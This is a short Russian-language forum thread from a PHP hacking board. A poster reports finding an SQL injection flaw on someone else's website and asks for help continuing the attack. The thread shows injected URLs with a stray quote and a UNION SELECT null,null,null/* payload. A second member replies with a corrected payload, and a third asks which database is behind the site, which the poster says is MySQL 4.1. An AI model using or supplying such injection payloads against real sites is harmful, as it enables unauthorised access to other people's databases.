sql injection some problems

Discussion in 'PHP' started by Daimyo, 30 Oct 2006.

  1. Daimyo

    Daimyo New Member

    Joined:
    18 Oct 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    добрый день появилась такая вот проблема
    есть сайт в котором найдена бага sql injection for example
    www.some.ru/bag.php?a=4'
    вылазит ошибка аля :
    sql error
    select first, second , third from test where a=4'
    подбираю кол столбцов когда их неверное кол-во вылазит сообщение об этом , вообщем пока все хорошо но как только дохожу до нужного значения например
    www.some.ru/bag.php?a=4+union+select+null,null,null/*
    вылазит ошибка sql но в тексте ошибки стоит уже другой запрос например:
    sql error
    select one from table where test=
    те в качестве условия where стоит таблица из которой бралось в первом запросе )

    вобщем вопрос банален что мне делать ? )

    ЗЫ надеюсь объяснил номрамльно если что то не понятно постораюсь дополнить :)
     
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    www.some.ru/bag.php?a=4'+union+select+null,null,null/*
     
  3. SQLHACK

    SQLHACK Остались только слоны

    Joined:
    27 Sep 2006
    Messages:
    437
    Likes Received:
    372
    Reputations:
    407
    Версия и тип БД какая ?
     
    _________________________
  4. Daimyo

    Daimyo New Member

    Joined:
    18 Oct 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    простите что так долго не отвечал
    MySQL 4.1